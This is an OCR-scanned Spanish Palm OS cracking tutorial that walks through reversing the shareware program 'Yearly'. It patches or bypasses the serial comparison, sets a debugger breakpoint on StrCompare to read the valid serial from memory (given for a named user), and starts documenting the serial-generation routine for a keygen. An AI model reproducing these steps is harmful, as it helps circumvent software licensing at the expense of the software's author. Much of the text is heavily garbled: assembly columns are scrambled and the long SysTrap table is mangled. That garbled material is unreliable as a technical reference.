dl 13420 DOOOBC5A 3F 3C 27 OF MOVE . W É$270F, -(A7) 

= |[13421 

di |l13422 X-ref to Alert (Registration) 

dal | [13423 

$0] 13424 —DODOSBC5E 4E 4F Al 22 SysTrap Frmálert 

Si necesita ayuda, pulse Fl Lín. 13419, Col. 2, CO DOS Mod.: 30/0305 08:14:0 

Opción 2 


Otra Opción seria hacer que el programa se compruebe a si mismo en lugar de comparar el serial 
real con el serial incorrecto, Esto lo podemos ver en: 


00008C56 BO 13 CMP.B (A3), DO <—-—-— Podriamos hacer que se compare haci mismo 


Opción 3 


Encontrar el serial seria tener que aprendérselo cada vez que lo instalemos, pero tiene sus 
ventajas como el de ser auténticos usuarios registrados y tendríamos derecho a futuras 
actualizaciones, además si el programador tubo la idea de crear un truco fantasma Trampa 
anticracker, es decir hacer creer que verdaderamente sea parchado pero hace que el programa 
funcione mal esto es por que sabe que funciones parchara el Palm Cracker y en su programa crea 
una rutina que al parchar ciertas instrucciones el programa trabaje mal, por eso no podemos 
nunca asegurar si la aplicación podrá trabajar bien peor aun si no se guardan bien los 
contenidos importantes en aplicaciones Palm, por ello los exhorto a que hagamos bien las cosas 
encontrando el verdadero serial ó crear un generador de números de serie si es el caso de 
Hotsync/Code Óó crear un generador de números de serie aleatorios, hay mucho código fuente 
disponible en la web para crear generadores de número de serie, es así como se esta cometiendo 
el verdadero sentido Palm Cracker y más cuando ya se tiene suficiente nivel de experiencia. 


Depurando 


Corremos el debugger ..... Continuara 


Conclusión 


Esto del ASM Palm es mas fácil que el de otras plataformas y a mi me cae mejor el ASM palm que el Win32, Yo recomiendo en lo particular 
empezar con el ASM palm y después seguirte con el de Windows 2005, Es prácticamente lo mismo la única diferencia radica en el cambio 
del nombre del juego de intrucciones assembler que en realidad hacen lo mismo , Por ejemplo una comparativa es por ejemplo la intrucción 
BRA en lenguaje Asm Palm contra JMP del lenguaje Asm en Windows 32 bits que en lenguaje maquina le dice a ambos microprocesadores 
de ambas plataformas que SALTE a x instrucción en especifica, Y haci es en infinidad de sistemas operativos, plataformas tanto como para: 
PC's, Palms, Pocket”s, Telefonos Celulares, Calculadoras, Robots, Relojes, Etc, Donde haya algo que utilicé un microprocesador. 


Palm Spanish Tutor: Pagina dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


)Serial (X)HotSync/ Code ( )Trial ( )Multiprotección ( )Encriptado ( )Otro 
Crear Un serial tipo HotSync/Name 

)NewBies ( )Intermedio (X) Avanzado ( ) Master ( )Gúru 
http://www. google. com 

Desensamblador IDA, PalmDebugger, POSE Palm emulador, PreView 
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Latigo W/31/04/2005 


INTRODUCCION 


¡Hola! Este es mi primer reversing Palm tutorial que esta enfocado al aprovechamiento de un listado muerto. 
Ahora la técnica usada es un tanto diferente. Usaremos un debugger para encontrar un número de serie pero 
no nos conformaremos con poco y también les enseñaré a hacer un KeyGen. Nuestro blanco es el programa 
"Yearly.pre" 


AL ATAQUE 
Palm Reversing - Un acercamiento a la realidad - Por Latigo/ UCF 


Comenzaremos cargando nuestra aplicación en el emulador o la palm Real e intentamos registrarnos con un serial basura el 
programa nos muestra el mensaje 'You entered a wrong code!". 

Dulcemente:) Buscamos las referencias de alertas en los archivos desensamblados. Cortamos en archivos el archivo entero 
con PreView (o cualquier otra herramienta similar por supuesto) , Con un poco de búsqueda encontramos el recurso de una 
alerta de nombre ' Talt0x138d.bin ' es la ventana donde se muestra el mensaje de código invalido. Así buscamos en el 
listado muerto con el IDA la cadena ' 138d ' 


code0001:000048B6 loc_0_48B6: 

code0001:000048B6 move.w 8(a0),d0 

code0001:000048BA cmpi.w  +544D,d0 

code0001:000048BE bne.s loc_0_48FA 

code0001:000048C0 move.]l  $A0OC(a4),- (sp) 

code0001:000048C4 systrap FldGetTextPtr () <- Poner en Ptr nuestro serial 
code0001:000048C8 move.l  a0,-(sp) <- Poner aquel Ptr ahora 
code0001:000048CA lea $560 (a4),a0 <- Cargar en A0 otro puntero 
code0001:000048CE pea 2(a0) 


code0001 
code0001 


code0001 
code0001 


code0001 
code0001 
code0001 


code0001 


:000048D2 
:000048D6 
code0001: 
code0001: 
:000048E2 
:000048E4 
code0001: 
code0001: 
:000048EC 
:000048EC 
:000048F0 
code0001: 
code0001: 
:000048F4 
code0001: 


000048DA 
000048DE 


000048E8 
000048EC 


000048EF0 
000048EF0 


000048F6 


systrap StrCopy () 

bsr sub_0_5CC 

adda.w  +*S$C,sp 

tst.w $28 (al) 

beg.s loc_0_48EC 

move.w  +$138C,- (sp) 

bra loc_0_48F0 
loc_0_48EC: 

move.w  1+$138D,- (sp) 
loc_0_48F0: 

systrap FrmAlert () 

addg.w +2,sp 

bra loc_0_4900 


<- copialo 

<- Saltar a función Reg 

<- Limpiar la pila 

<- Registro de Bandera es 0? 
<- JZ Mensaje de chico malo 
<- Mostrar el mensaje bueno 


¿== AQUI! 


Así después de un poco de mirar nos encontramos con que el esquema es una típica. Llamada a la función (000048D6), 
comparar RegFlag (000048DB), JZ Chico malo (000048E2) ó de lo contrario se mostrara el mensaje "Thank 

you' (000048E4). Conseguimos ahora entrar a la función ' Reg ' (no tenemos que desensamblar todo) , A primera cosa yo 
siempre echo un vistazo a la función entera. Digo, una mirada rápida a ver cuánto tiempo es y para inspeccionar la 
existencia de otras llamadas API que podrían facilitar mi trabajo. Al final de esta sub-rutina encuentro suculento código: 


code0001 
code0001 


un 000048CA 
code0001 


code0001: 


breakpoint 


code0001: 
:000006D0 
:000006D2 


code0001 
code0001 
banderas 


code0001: 
:000006D8 
:000006D8 
:000006DE 


code0001 
code0001 
code0001 


code0001: 


Retirar 


:000006BE 
:000006BE 
code0001: 


000006C2 


:000006C6 


000006CA 


000006CE 


000006D8 


0000060 


loc_0_6BE: 
lea 
pea 


pea 
systrap 


tst.w 


bne.s 
move .w 


loc_0_6D8: 


movem.]l var_18(a6),d3-d7/a2 <- pop registers 


unlk 
rts 


5560 (a4),a0 
2(a0) 


$2A0 (a4) 
StrCompare () 


el0) 


loc_0_6D8 
+1,528(a4) 


a6 


<- Poner aqui los mismos ptr como 


<- Dirección del serial generado 
<- La API para poner un 


<- Son los mismos? 


<- JNE Chico malo 
<- Poner 1 en el registro de 


(2) 


<- RET 


¡Tiempo para ' vivir ' inverso! Qué vamos a hacer ahora , pondremos un breakpoint en el StrCompare SysTrap usando al 
PalmDebugger. ¿Cómo hacer esto? La orden para ' breakpointing ' en una API (colocando una trampa) es con un' ATB”. 
Así en PalmDebugger debemos poner la instrucción "ATB ApiNumber" para tener exito se debe colocar un bpx. Debo 
confesarme que gasté montones de días buscando alguna referencia API. Y al fin me encontré con que esta misma lista 
puede ser encontrada en el PalmOs SDK. De cualquier manera, Les proveo de una lista bonita y comprensible aquí Abajo. 


SysTrap (Con trap number) 


Lista para poder poner Breakpoints con el Debugger. 


sysT 


sysl 


sys 


sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


8y sat 
syal 
sysT 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


rapMemInit 0x0 
rapMemInitHeapTable 
rapMemStorelnit 0x2 
rapMemCardFormat 0x3 
rapMemCardIntfo 0x4 
rapMemStorelnfo 0x5 
rapMemStoreSetIinfo = 
rapMemNumHeaps 0x7 
rapMemNumRAMHeaps = 
rapMemHeapID 0x9 
rapMemHeapPt r Oxa 
rapMemHeapFreeBytes 
rapMemHeapSize Oxc 
rapMemHeapF lags Oxd 
rapMemHeapCompact = Oxe 
rapMemHeapInit Oxf 
rapMemHeapFreeByOwnerlD 
rapMemChunkNew 0x11 
rapMemChunkF ree 0x12 
rapMemPtrNew 0x13 
rapMemPtrRecoverHandle 
rapMemPtrFlags 0x15 
rapMemPtrSize 0x16 
rapMemPtrOwner 0x17 
rapMemPt rHeapID 0x18 
rapMemPtrCardNo 0x19 
rapMemPtrToLocalID Oxla 
rapMemPt rSetOwner 0x1b 
rapMemPtrResize 0Oxlc 
rapMemPtrResetLock Ox1ld 
rapMemHandleNew Oxle 
rapMemHandleLockCount 
rapMemHandl] oLocalID 
rapMemHandleLock 0x21 
rapMemHandleUnlock 0x22 
rapMemLocalIDToGlobal 
rapMemLocalIDKind 0x24 
rapMemLocallIDToPtr 0x25 
rapMemMove 0x26 
rapMemSet 0x27 
rapMemStoreSearch 
rapMemPtrDataStorage 
rapMemKernelInit = 0x2a 
rapMemHandleFree 0x2b 
rapMemHandleFlags 0x2c 
rapMemHandleSize 0x2d 
rapMemHandleOwner 0x2e 
rapMemHandleHeapID 0x2f 
rapMemHandleDataStorage 


0x1 


0x6 


0x8 


Oxb 


0x28 


Ox1f 
0x20 


0x23 


0x29 


rapMemHandl] 


leCardNo 


0x31 


rapMem 
rapMem 


0x32 
0x33 
0x34 


leSetOwner 
leResize 
leResetLock 


andl 
andl 
andl 


rapMem 
rapMemPtrUnlock 

rapMemLocalIDToL 
rapMemSetDebugMo 
rapMemHeapScramb 
rapMemHeapCheck 
rapMemNumCards 

rapMemDebugMode 
rapMemSemaphorer 


0x35 
ockedPtr 
de 0x37 
le 0x38 
= 0x39 
0x3a 
0x3b 
serve = 0x3c 


0x36 


rapMemSemaphorer 
rapMemHeapDynami 
rapMemNVParams 
rapDmInit 0x40 
rapDmCreateDatab 
rapDmDeleteDatab 
rapDmNumDatabase 
rapDmGetDatabase 


lease = 0x3d 
0x3e 
0x3f 


e 


0x41 

0x42 
0x43 

0x44 


ase = 
ase 
Ss 


sysTrapDmFindDatabase = 0x45 
sysTrapDmDatabaselnfo = 0x46 
sysTrapDmSetDatabaselnfo = 0x47 


sysT 


sys 


sysT 
sysaT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
SysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sysl 


sys 


sysT 
sysT 


sys 


sysT 
sysT 
sysT 


sys 


sysT 
sysT 
3y sal 


sys 


sysT 
sysT 
sysT 


rapDmDatabaseSize = 0x48 
rapDmOpenDatabase 0x49 
rapDmCloseDatabase Ox%4a 
rapDmNextOpenDatabase = 0x4b 
rapDmOpenDatabaselnfo 0x4c 
rapDmResetRecordStates 0x4d 
rapDmGetlLastErr 0x4e 
rapDmNumRecords 0x4f 
rapDmRecordInfo 0x50 
rapDmSetRecordInfo 0x51 
rapDmAttachRecord 0x52 
rapDmDetachRecord 0x53 
rapDmMoveRecord 0x54 
rapDmNewRecord 0Ox55 
rapDmRemoveRecord = 0x56 
rapDmDeleteRecord 0x57 
rapDmArchiveRecord 0x58 
rapDmNewHandle Ox59 
rapDmRemoveSecretRecords = Ox5a 
rapDmQueryRecord Ox5b 
rapDmGetRecord Ox5c 
rapDmResizeRecord 0x5d 
rapDmReleaseRecord Ox5e 
rapDmGetResource Ox5f 
rapDmGetlResource 0x60 
rapDmReleaseResource 0x61 
rapDmResizeResource 0x62 
rapDmNextOpenResDatabase 
rapDmFindResourceType 
rapDmFindResource 0x65 
rapDmSearchResource 0x66 
rapDmNumResources 0x67 
rapDmResourcelnfo 0x68 
rapDmSetResourcelnfo = 0x69 
rapDmAttachResource = 0Ox6a 
rapDmDetachResource 0x6b 
rapDmNewResource 0Ox6c 
rapDmRemoveResource 0x6d 
rapDmGetResourcelndex = 0x6 
rapDmQuickSort Ox6f 
rapDmQueryNext InCategory 
rapDmNumRecordsInCategory 
rapDmPositionInCategory 
rapDmSeekRecordInCategory 
rapDmMoveCategory 0x74 
rapDmOpenDatabaseByTypeCreator 
rapDmnWrite 0x76 

rapDmStrCopy 0x77 
rapDmGetNextDatabaseByTypeCreator = 0x78 
rapDmWriteCheck 0x79 
rapDmMoveOpenDBContext 
rapDmFindRecordByID 0x7b 
rapDmGetAppInfoID 0x7c 
rapDmFindSortPositionV10 
rapDmSet 0x7e 
rapDmCreateDatabaseFromimage 
rapDbgSrcMessage 0x80 
rapDbgMessage 0x81 
rapDbgGetMessage 0x82 
rapDbgCommSettings 0x83 


0x63 
0x64 


0x70 
0x71 

0x72 

0x73 


0x75 


0x7a 


0x7d 


0x7f 


sys 


rapErrDisplayFileLineMsg = 0x84 


sys 


rapErrSetJump 0x85 


sys 
sys 


TrapErrThrow 


rap .'ongJump 0x86 
0x87 


pro 


sys 
sys 


TrapSysBroadcastActionCode 


rapErrExceptionList 0x88 


0x89 


sysTrapSysUnimplemented = 0x8a 
sysTrapSysColdBoot = 0x8b 
sysTrapSysReset = 0x8c 
sysTrapSysDoze = 0x8d 
sysTrapSysAppLaunch = 0x8e 
sysTrapSysAppStartup = 0x8f 
sysTrapSysAppExit = 0x90 
sysTrapSysSetA5 = 0x91 
sysTrapSysSetTrapAddress = 0x92 
sysTrapSysGetTrapAddress 0x93 
sysTrapSysTranslateKernelErr = 0x94 
sysTrapSysSemaphoreCreate = 0x95 
sysTrapSysSemaphoreDelete = 0x96 
sysTrapSysSemaphoreWait = 0x97 


sysTrapSysSemaphoreSignal = 0x98 


sysTrapSysTimerCreate = 0x99 
sysTrapSysTimerWrite = 0x9%a 
sysTrapSysTaskCreate = 0x9%b 


sysTrapSysTaskDelete = 0x9c 
sysTrapSysTaskTrigger = 0x9d 
sysTrapSysTaskID = 0Ox9e 
sysTrapSysTaskUserInfoPtr = 0x9f 
sysTrapSysTaskDelay = 0xa0 
sysTrapSysTaskSetTermProc = Oxal 
sysTrapSysUlLaunch = 0xa2 
sysTrapSysNewOwnerID = 0xa3 
sysTrapSysSemaphoreSet = 0Oxa4 
sysTrapSysDisablelnts = 0Oxa5 
sysTrapSysRestoreStatus = 0xa6 
sysTrapSysUIAppSwitch = 0Oxa7 
sysTrapSysCurAppInfoPV20 = 0xa8 
sysTrapSysHandleEvent = 0xa9 
sysTrapSysInit = Oxaa 
sysTrapSysQSort = Oxab 
sysTrapSysCurAppDatabase = Oxac 
sysTrapSysFatalAlert = 0Oxad 


sysTrapSysResSemaphoreCreate = Oxae 
sysTrapSysResSemaphoreDelete = Oxaf 
sysTrapSysResSemaphoreReserve = 0xb0 
sysTrapSysResSemaphoreRelease = 0Oxbl1l 


sysTrapSysSleep = 0xb2 
sysTrapSysKeyboardDialogv10 = 0xb3 
sysTrapSysAppLauncherDialog = 0xb4 


sysTrapSysSetPerformance = Oxb5 
sysTrapSysBatteryInfoV20 = 0xb6 
sysTrapSysLibInstall = 0xb7 
sysTrapSysLibRemove = 0xb8 


sysTrapSysLibTblEntry = 0Oxb9 
sysTrapSysLibFind = Oxba 
sysTrapSysBatteryDialog = Oxbb 
sysTrapSysCopyStringResource = Oxbc 
sysTrapSysKernelInfo = Oxbd 
sysTrapSysLaunchConsole = Oxbe 
sysTrapSysTimerDelete = Oxbf 
sysTrapSysSetAutoO0ffTime = 0xc0 
sysTrapSysFormPointerArrayToStrings = 0Oxcl 
sysTrapSysRandom = 0xc2 
sysTrapSysTaskSwitching = 0xc3 
sysTrapSysTimerRead = 0xc4 

sysTrapStrCopy = 0Oxc5 
sysTrapStrCat = 0xc6 
sysTrapStrLen = 0xc7 
sysTrapStrCompare = 0xc8 
sysTrapStrIToA = 0xc9 
sysTrapStrCaselessCompare = Oxca 
sysTrapStrIToH = Oxcb 
sysTrapStrChr Oxcc 
sysTrapStrsStr Oxcd 
sysTrapStrATol = 0Oxce 


sysTrapStrToLower = Oxcf 
sysTrapSerReceivelsP = 0xd0 
sysTrapSlkOpen = 0Oxdl 
sysTrapSlkClose = 0xd2 
sysTrapSslkOpenSocket = 0xd3 
sysTrapSlkCloseSocket = 0xd4 
sysTrapSlkSocketRefNum = 0Oxd5 
sysTrapSlkSocketSetTimeout = 0xd6 
sysTrapSlkFlushSocket = 0xd7 
sysTrapSlkSetSocketListener = 0xd8 
sysTrapSlkSendPacket = 0xd9 
sysTrapSlkReceivePacket = Oxda 
sysTrapSl1kSysPktDefaultResponse = Oxdb 
sysTrapSlkProcessRPC = 0Oxdc 
sysTrapConPutS = Oxdd 

sysTrapConGetS = 0Oxde 

sysTrapFplInit = Oxdf 
sysTrapFplFree = 0xe0 
sysTrapFp1FToA = 0Oxel 
sysTrapFpl1ATor = 0xe2 
sysTrapFplBasel0Info = 0xe3 
sysTrapFplLongToFloat = 0xe4 
sysTrapFplFloatToLong = 0xe5 
sysTrapFplFloatToULong = 0xe6 
sysTrapFplMul = 0xe7 
sysTrapFplAdd = 0xe8 
sysTrapFplSub = 0xe9 
sysTrapFplDiv = Oxea 


sysTrapScrInit = 0Oxeb 
sysTrapScrCopyRectangle = 0Oxec 
sysTrapScrDrawChars = Oxed 
sysTrapScrLineRoutine = 0Oxe 
sysTrapScrRectangleRoutine = Oxef 
sysTrapScrScreenInfo = Oxf0 


sysTrapScrDrawNotify = Oxf1 
sysTrapScrSendUpdateArea = 0xf2 


sysTrapScrCompressScanLine = 0xf3 
sysTrapScrDeCompressScanLine = 0xf4 
sysTrapTimGetSeconds = Oxf5 
sysTrapTimSetSeconds = Oxf6 


sysTrapTimGetTicks = 0xf7 
sysTrapTimInit = 0xf8 
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sysTrapPhoneNumberLookup = 0x2ef 
sysTrapFrmSetMenu = 0x2f0 
sysTrapEncDigestMD5 = 0x2f1 
sysTrapDmFindSortPosition = 0x2f2 
sysTrapSysBinarySearch = 0x2f3 
sysTrapSysErrString = 0x2f4 
sysTrapSysStringByIndex = 0x2f5 
sysTrapEvtAddUniqueEventToQueue = 0x2f6 


sysl 


sys 
sys 


sysT 


sys 
sys 
sys 


TrapCategoryInitialize 
TrapEncDigestMD4 


0 


PrapStrLocalizeNumber 
PrapStrDelocalizeNumber 
rapLocGetNumberSeparator 
rapMenuSetActiveMenuRsclI 
0x2fb 


PrapLstScrollList 


0x2fd 


sys 
sysl 
sys 
sys 
sys 

sysl 
sys 
sys 


TrapWinSetWindowBounds 
TrapCategorySetName 
TrapFldSetInsertionPoint 


TrapWinSetColors 
Traprlp 


rapEncDES 0x2fe 
PrapLstGetVisibleltems 


0x3 


PrapFrmSetObjectBounds 
0x304 
0x305 


Dispatch 


sys 


rapFl1pEmDispatch 0x306 


sys 


sysT 


rapExgInit 0x307 
rapExgConnect 0x308 


sys 


rapExgPut = 0x309 


sys 


rapExgGet 0x30a 


sys 


rapExgAccept 0x30b 


sys 


rapExgDisconnect 0x30c 


sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 


TrapExgNotifyReceive 
TrapExgControl 
TrapPrgStartDialog 


TrapPrgUpdateDialog 
TrapPrgHandleEvent 
TrapImcReadFieldNoSemicol 


TrapImcWriteNoSemicolon 
TrapImcStringlsAscii 


rapExgSend 0x30d 


TrapExgReceive = 0x30 


0x3 
0x 


PrapExgRegisterData 


0x311 
0x31 

0x313 
0x3 

0x31 


PrapPrgStopDialog 


PrapImcReadFieldQuotableP 


TrapImcReadPropertyParame 
TrapImcSkipAllPropertyPar 
TrapImcReadWhiteSpac 


=0 
PrapImcWriteQuotedPrintab 


0x 


sys 


x2f7 
0x2f8 

s = 0x2f9 

D 0x2fa 


0x2fc 


Ox2ff 
0x300 
01 


0x302 
0x303 


of 
310 


2 


14 

5 

on 0x316 

rintable 

ter 

ameters 

x3la 

le 0x31b 
0x31c 

31d 


rapTblGetItemFont = 0x31 


sys 
sys 
sys 

sysl 
sysl 
sys 
sys 

sysl 
sysl 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 
sys 
sys 

sysl 
sys 


TrapFontSelect 
TrapFntDefineFont 


TrapSysBatteryIntfo 
TrapSysUlBusy 


TrapCtlValidatePointer 
TrapWinMoveWindowAddr 


TrapFrmNewForm 
TrapCtlNewControl 
TrapFldNewField 


TrapFrmNewLabel 
TrapFrmNewBitmap 
TrapFrmNewGadget 


TraprFileClose 
TrapFileDelete 
TrapFileReadLow 


TrapFileSeek = 
TrapFileTel1l 


TrapFileTruncate 


TrapFrmActiveState 


bl1SetItemFont 0x31 
0x320 
0x321 
PrapCategoryEdit 0x322 
PrapSysGetOSVersionString 
0x32 


rap 


0x325 
PrapWinValidateHandle 


PrapFrmValidatePtr 


0 
0x32 


0 


PrapFrmAddSpaceForO0bject 
0x32b 
0x32c 
0x32d 
PrapLstNewList = 0x32 
0x32f 
0x330 
0x331 
0x332 
0x333 
0x334 
0x335 
0x336 
0x337 
0x338 
0x339 
0x33a 
0x33 


PrapFileOpen 


PrapFileWrite 


PrapFileControl 


f 


4 


0x323 


x326 

7 

0x328 
x329 
0x32a 


b 


0x318 
0x319 


0x317 


sysTrapSysGetAppinfo = 0x33c 
sysTrapSysGetStackInfo = 0x33d 
sysTrapScrDisplayMode = 0x33e 
sysTrapHwrLCDGetDepth = 0x33f 
sysTrapHwrGetROMToken = 0x340 
sysTrapDbgControl = 0x341 
sysTrapExgDBRead = 0x342 
sysTrapExgDBWrite = 0x343 
sysTrapSysGremlins = 0x344 
sysTrapFrmRemoveO0bject = 0x345 


StrCompare es 0XC8. Eso significa que tenemos que ponerle fuego al PalmDebugger, Primero Poner el debugger en ' 
Emulator ' en ' menu "Connection" (in the case you want to debug a program which is running on the emu por supuesto) , 
Invocar Con el comando "ATT", (Para conectar el debugger),Buscamos un "atb 0Oc8" y entonces con "9" entramos al 
emulador y se congela el debugger (Es el mismo que el F5 en el debugger Softlce de Windows 32 bits). 


Ahora regresemos al Yearly.PRC en la palm e intentemos registrarnos como antes (Recuerda, Todo el tiempo el emulador 
salta al debugger cuando encuentra algún "bp", la ejecución es libreada y podemos trabajar en el debugger. Para 
devolver a la ejecución a la palm o el emúlador, Solo basta poner un Go "G" y un "Enter" por supuesto. 


Escribir un serial y dar click en "OK", BOOm!! Allí conseguimos ir . StrCompare toma dos parámetros, uno (en este caso) 
es el serial que hemos escrito y el otro es el serial generado bueno. 


La pregunta es en que lugar de la memoria tenemos nuestro verdedero serial:) 

(Btw Yearly toma como un nombre de usuario el nombre del usuario HotSync, en mi caso es ' Latigo '). Escribimos un 
comando ' il ' para desensamblar las 10 líneas de código a partir del breakpoint. Hacemos esto para comparar este código 
dentro del IDA para saber si estamos en el lugar correcto. 

Regresamos al código desensamblado, sabemos que punteros son presionados: 


000007€2 45 EC 02 AO LEA.L $2A0(A4), A2 
000007C6 42 32 50 00 CLR.B $0(A2, D5.W) 
000007CA 48 6C 02 AO PEA.L $2A0(A4) 
000007CE 4E 4F AO C7 SysTrap Strlen 
000007D2 58 4F ADD.W $$4, A7 

000007D4 0C 40 00 08 CMP.W +$0008, DO 
000007D8 63 14 BLS.S LOC_7EE 

000007DA 48 6C 02 AO PEA.L $2A0(A4) 
000007DE 4E 4F AO C7 SysTrap Strlen 
000007E2 E2 48 LSR.W $$1, DO 

000007E4 36 00 MOVE.W DO, D3 

000007E6 52 43 ADD.W $$1, D3 

000007E8 42 32 30 00 CLR.B $0(A2, D3.W) 
000007EC 58 4F ADD.W $$4, A7 


loc_7EE: 

000007EE 41 EC 05 60 LEA.L $560(A4), AO 

000007F2 48 68 00 02 PEA.L $2(A0) <- Empuja aquí el mismo ptr como adentro 000048CA 
000007F6 48 6C 02 AO PEA.L $2A0(A4) <- Dirección para la generación del serial 


000007FA 4E 4F AO C8 SysTrap StrCompare 
000007FE 4A 40 TST.W DO 

00000800 66 06 BNE.S LOC_808 

00000802 39 7C 00 01 00.. MOVE.W +$0001, $28 (A4) 
loc_808: 

00000808 4C EE 

0000080A 04 F8 DC.W +04F8 

0000080C FF E8 DC.W FFFES 

0000080E 4E 5E UNLK.L A6 

00000810 4E 75 RIS 


Nos interesa el $2A0(A4) Ya que el otro contiene una copia de nuestro serial. 

'$2A0(A4) Siguiente manera: "Tomaremos la dirección que está contenida en el registro A4, añadiéndole Ox2A0 él 
puntero nos llevara a algo, entonces pondremos el puntero y conseguiremos el serial real ' 

Para saber los contenidos de A4 debemos escribir el comando ' REG ' (Para que nos muestre los contenidos de TODOS 
los registros). En este caso, A4 contiene a' 0001306A '. 0x2A0 deberíamos de agregar este, dándonos 0x1330A como 
consecuencia. ÉSTE es el puntero de la cadena. Todo lo de la izquierda esta en 'DM 1330A' (DM = Display Memory) 
Este es el resultado de la busqueda en memoria: 


0001330A: 35 36 36 38 00 00 00 00 00 00 00 00 00 00 00 00 A " 
Con el comando "dm a1" encontramos el serial falso. 
Otra manera de encontrar el serial es usar el comando "dm a1" 


El número 5668 es el serial para un HotSync/name "Latigo" 


Of course, the other pointer passed as parameter to StrCompare was our username, but just in case you wanna double 
check do the following: 0x1306A + 0x560 + 0x2 = 0x135CC 

'DM 135CC' and you'll see what you entered as a serial. (Btw, the last 'Dx2" is added to our addresses cos that is what 
happens at code0001 :000006C2) 


Que es eso! , Allí lo tenemos! un agradable 'Listado muerto ' +* Acercamiento con la memoria ' 

Por consiguiente, La parte de este tutorial enseñara como realizar el keygen, Sigue leyendo abajo. 

Comandos usado en el PalmDebugger.exe (checar la lista de comandos del PalmDebugger's con la ayuda que se incluye 
con help): 


Comando Descripción 


ATB Colocar un trap break. Sytanx = atb 'SysTrap number' 
G Continuar ejecucion. Toma la dirección de la memoria es parametro opcional 
ATT Conectar el debugger con un Emulador ó Palm remota 
IL Desensamblar el código del programa actual en la dirección (ElP). 
DM (Dumps) Mostrar el contenido de la memoria 
REG Mostrar todos los registros. 


Ok, Esto es todo espero que les haya gustado , hitp://www.latigo.cjb.net. Bye! 


KeyGen early 3.1c "Generador de llaves" 


Son algunas instrucciones en DragonBall cpu comentadas y traducidas para una mejor comprensión. Al final esta el código 
fuente del KeyGen en lenguaje Assembler para Win32Asm . 

Subrutina (s) que el programa usa para generar y validar un número de serie. Cada línea es comentada y las instrucciones 
traducidas a x86 son descritas después del carácter '|'. Las instrucciones del x86 son ' mixtas ' con los registros DragonBall. (Se 
verán los términos más adelante) lo hice de forma que se pudiera entender el algoritmo. 


code0001:000005CC link ab, +0 ¡ Crear espacio en la 
memoria para variables 

code0001:000005DO movem.1 d3-d7/a2,- (sp) ¡; Guardar registros y 
destruirlos 


code0001:000005D4 pea S9E0 (a4) ¡ Pon el username 


code0001: 
code0001: 


D6 | mov 


code0001: 


d2,0fh 


code0001: 
by d2 | shr d0,d2 
code0001: 
code0001: 
code0001: 
code0001: 
code0001: 
code0001: 
code0001: 


a7 | mov 


code0001: 
code0001: 


000005D8 
000005DC 
D6,d0 
000005DE 


000005E0 


000005E2 
000005E4 
000005E6 
000005E8 
000005EA 
000005EC 
000005EE 
da7,d6 
000005F0 
000005F2 


bandera de registro. 


code0001 
add esp, 
code0001 


serial es = 2? 


code0001 
code0001 


del serial | lea a0, cualquiera 


code0001 


4 


:000005F6 


:000005F8 


:000005FC 
:00000600 


:00000604 


en la pila 


code0001 
code0001 
code0001 


:00000608 
:0000060€ 
:0000060E 


Caracteres? 


code0001 
code0001 
code0001 
code0001 
code0001 


:00000612 
:00000616 
:00000618 
:0000061A 
:0000061C 


del serial? | cmp 


code0001 
code0001 
code0001 
code0001 


:0000061E 
:00000620 
:00000620 
:00000620 


d6,a3 


loc_0_620: 


d4,0 or cmp d4,Nulo 


code0001 
code0001 


que contiene el serial generado 


code0001 
code0001 


en la posición d3 en la cadena de 


code0001 


:00000622 
:00000624 


:00000628 
:0000062C 


:00000630 


systrap 
move .w 


moveqg 
lsr.w 


add.w 
move .w 
asr.w 
move .w 
move .w 
add.w 
move .w 


sub.w 
clr.w 


addg.w 
cmpi .w 


ble 
lea 


pea 


systrap 
addg.w 
cmpi .w 


bls 
clr.w 
move .w 
subg|. w 
Ccmp . w 


ble.s 


tst.w 


blt.s 
lea 


lea 
move .b 


Strilen () 
d0,d6 


SF, d2 
a2,d0 
d6,da0 
d0,d7 
$1,0d7 
a7,da4 
a4,d0 
da4,d0 
da6,d7 


d0,d7 
$28 (al) 


$4,sp 
$2,d6 


loc_0_6D8 


$560 (a4),a0 


2(a0) 


Strilen () 
$4,sp 
$2,d0 


loc_0_6D8 
a5 

d4,da3 
+1,d3 
d3,d6 


loc_0_65É 


d4 


loc_0_65É 


52A0 (a4) ,al 


S9E0 (a4),a0 
(a0,d3.w),dl 


. 
, 


. 
14 


. 
, 


. 
14 


mov serial's longitud de 


move 0xf de d2 | mov 


Cambia a la derecha d0 


add d6 to d0 | ADD d0,d6 
mov d7,d0 
shr d7, 1 
mov d4,d7 
mov d0,d4 
add d0, d4 
mov serial's longitud en 


sub d7,d0 
Pon un 0 en nuestra 


corrección de la pila | 
La longitud de nuestro 


Salta a mal tipo 
Mete en a0 la dirección 


Pon una copia del serial 


Corrección de pila 
La longitud es de 2 


Salta a mal pillo 

Borra los registros de d5 
mov d3,d4 

SUB d3,1 

is DX = nuestra longitud 


Si ,Salta a alguna parte 


CODE XREF: sub_0_5CC+90.3 
Es d4 nulo ó 0? | cmp 


Si, Salta a algún lado 
Pon en al la dirección 


Apuntar el username en a0 
Mover a dl el caracter 


a0 | MOV d1,BYTE PTR [a0+d3] 


ext.w 


es CBW Pero no utilizado en mi keygen 


code0001 


con otro registros 


code0001 


:00000632 


:00000636 


move .b 


ext.w 


al 


(a0,d4.w),dA0 


da0 
